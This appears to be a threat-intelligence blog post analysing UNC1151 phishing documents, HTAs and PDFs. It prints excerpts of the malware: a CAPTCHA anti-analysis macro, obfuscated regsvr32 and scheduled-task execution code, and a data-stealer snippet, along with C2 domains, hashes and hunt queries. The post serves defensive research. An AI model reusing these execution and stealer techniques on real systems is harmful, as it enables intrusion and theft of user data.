Back to Blog
Expert Intelligence & Analysis

Captch-ya if you can

Authors
StrikeReady Labs
PublishedDecember 5, 2025
Est. Read Time6 min read

UNC1151 has operated with a higher operational tempo in 2025, and in this blog, Labs shows how to track this actor, by surfacing two clusters of activity, and tying it to previously attributed samples.

Files that leverage anti-analysis techniques can often be interesting threads to pull on. In this case, we noticed a true positive document detection that wasn’t executing properly in our analysis environment, and it quickly became clear why. For a background on UNC1151, you should read high quality articles on this actor from CERT-PL, SentinelOne, Harfang Lab, GTIG/Mandiant, and Proofpoint.

The document (Лист мадопомога.doc ec0e4a3dcfcc85ed52783f7cf2e80ddf) was leveraging a dynamic captcha, created in a local macro, to prevent analysis.

The reason we known it was to prevent detection, is that the first goal of a phish is to get code exec via opening the document. The attacker had already achieved macro execution to run, so any roadblocks that would be thrown up, would only be to aggravate detection.

The macro in the document was constructed in the below, self-documented, code block. Noteworthy is that when the captcha is correct, the string uOMeDrJtHN is being passed to unprotect the document, and the function llolo10ooll executed, which we will pivot on later. This has the hallmarks of being generated by an LLM. The rest of the obfuscation leverages 1, L, 0 and o, which seems to be a nod to lol.

1Private Sub CommandButton1_Click() 2 ' Validate the user input CAPTCHA 3 userInput = Me.TextBox1.Value 4 correctCaptcha = Me.Label2.Caption 5 6 If userInput = correctCaptcha Then 7 MsgBox "CAPTCHA verified successfully!", vbInformation 8 ActiveDocument.Unprotect ("uOMeDrJtHN") 9 For i = ActiveDocument.Shapes.Count To 1 Step -1 10 ActiveDocument.Shapes(i).Delete 11 Next i 12 llolo10ooll 13 Else 14 MsgBox "Incorrect CAPTCHA. Please try again.", vbExclamation 15 ' Optionally, regenerate a new CAPTCHA 16 Label2.Caption = GenerateRandomCaptcha() 17 End If 18End Sub 19 20Private Function GenerateRandomCaptcha() As String 21 ' Characters to choose from for captcha 22 characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" 23 Randomize ' Initialize random number generator 24 ' Generate a 6-character random CAPTCHA 25 For i = 1 To 6 26 captcha = captcha & Mid(characters, Int((Len(characters) * Rnd) + 1), 1) 27 Next i 28 GenerateRandomCaptcha = captcha 29End Function

Figure 2: VB code to dynamically create a CAPTCHA

The document is then unprotected, the below decoy is shown, and the macro carves a dll and executes.

The full script is available in the appendix, but the MZ header encoding starts 37 37 20 39 30 77 90MZ.

The carved file, EdgeService.dll 59b4add2262c4f44a3dc955893fe583d, beacons to agelessinvesting.xyz.

Pivoting on the aforementioned doc password, We can see the following matches

FileUploaderHash (MD5)C2
РЕЗЮМЕ_Костенко.docUkraine1990c4504010cd123c5d99ffee5551aaemfempowerment.top
unknownUkraine7505ce7cba927140b91fd51986c4e717hometownplate.top

Figure 5: other recent payloads from this actor

Left to an exercise for the reader, one can also find many similarities to previously attributed samples, such as the macro that launches the dll, such as 433A5C57696E646F77735C53797374656D33325C72656773767233322E657865 (regsvr32) or 2F75202F7320, the arguments. An example match from Harfang Lab’s post would be Список на перевірку 2025-2026.xls e21f310442347eeed2210a75c1fa8e01

1o01lolololl1.TargetPath = o0101l0ll1o("433A5C57696E646F77735C53797374656D33325C72656773767233322E657865") 2o01lolololl1.Arguments = o0101l0ll1o("2F75202F7320") & Chr(34) & oo10l0lol & o0101l0ll1o("5C45646765536572766963652E646C6C") & Chr(34) 3o01lolololl1.Description = "" 4o01lolololl1.WindowStyle = o0101l0ll1o("30") 5o01lolololl1.WorkingDirectory = loll11ol0o 6o01lolololl1.Save 7Set o01lolololl1 = Nothing

Figure 7: sig-able execution block, even obfuscated

Noticing that aspects of the above were being detected by ESET as FrostyNeighbor, we went hunting on their other detections to try to find other samples. This led us to a set of HTAs 929. w sprawie zaniechania poboru podatku dochodowego od osób fizycznych.hta 9f5f8910fe8a554640124805ccfceadc. After execution, we can see the decoy content:

Examining the decoded first stage payload, an embedded HTA, we can see similar building of execution using Chr(34).

1a0_0x1ddaff.Description = "Create automated workflows between QQ applications and services to synchronize files, get notifications, collect data, and more"; 2var taskName = "QQ Automated Workflows"; 3var programPath = a0_0x42397a; 4var a0_0x16e3db = "//B //E:jscript " + String.fromCharCode(34) + programPath + ":Zone.Identifier" + String.fromCharCode(34) + " /QQEX"; 5a0_0x2838df.Arguments = a0_0x16e3db; 6a0_0x225f2e.Settings.MultipleInstances = 1;

Figure 9: similar execution obfuscation

After rounds of decoding, available in the appendix, we can see a data stealer

1var a0_0x76f3fa = "https://recommendations.99boulders.icu/how-to-tie-climbing-knots-stretches-bouldering.html"; 2var a0_0x5efd49 = "https://recommendations.99boulders.icu/builds/core/8f656da/gdpr/vendor/prebid/es2018/prebid.min.js"; 3var a0_0x1fb64f = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"; 4a0_0x14aa73.push("User: " + userName); 5a0_0x14aa73.push("\nComputer: " + computerName); 6a0_0x14aa73.push("\nSystem: " + osVersion); 7a0_0x14aa73.push("\nBooted: " + a0_0x18bb96); 8a0_0x14aa73.push("\nTime: " + new Date());

Figure 10: readable data stealer ftw

Looking for commonalities in the code, we can find a substantially similar payload used in a ClickFix attack, described by researcher Ireneusz Tarnowski targeting Poland. For further analysis of that payload chain, please see the link.

Circling back to our original HTA payload, we can see that it was loaded by a malicious PDF file W202504281099-01.pdf

By looking for PDF files that have similar execution paths, we can find Potwierdzenie_215082025.pdf d10669832288eeb84b7cb2043f9d53d6 dropping a similar looking 926. zmieniające rozporządzenie w sprawie szczegółowych warunków i szczegółowego trybu przyznawania i wypłaty pomocy finansowej w ramach schematów na rzecz dobrostanu zwierząt w ramach.hta 9f70fdf21212846b23a4a2fa188fc6db beaconing to, as well as 2de562e10411ccd868feb556f8c8f53b GMP_GMP093571.pdf to fermen.pickleandferment.top

Top level fileHash (MD5)C2 / Domain
W202504281099-01.pdf8ad246c273defa19cdea4f6fb178aa5frecommendations.99boulders.icu
GMP_GMP093571.pdf2de562e10411ccd868feb556f8c8f53bfermen.pickleandferment.top
Potwierdzenie_215082025.pdfd10669832288eeb84b7cb2043f9d53d6konsolahetman-epuap.abstractedreality.online
Zalacznik.raraf5bd3584dba96a1bf765ed9aefe7f1d
Zalacznik.tar.gz6d5513b888fbf86077f73560448d2d14

Figure 13: recent PDF files from this attacker

VT QueriesNotes
engines:frostyneighborDetects this cluster, primarily from ESET
content:"/P -2112 /Perms"Detects a specific permission structure
content:"uOMeDrJtHN"Detects the key used to unlock docs

Figure 14: VT hunt queries

All files mentioned are available for download on our github.

Please get in touch at research@strikeready.com if you have question, corrections, or comments, or if you appreciate Richard Wolf’s attribution.

End of Intelligence Briefing

Share this PostCaptch-ya if you can
0%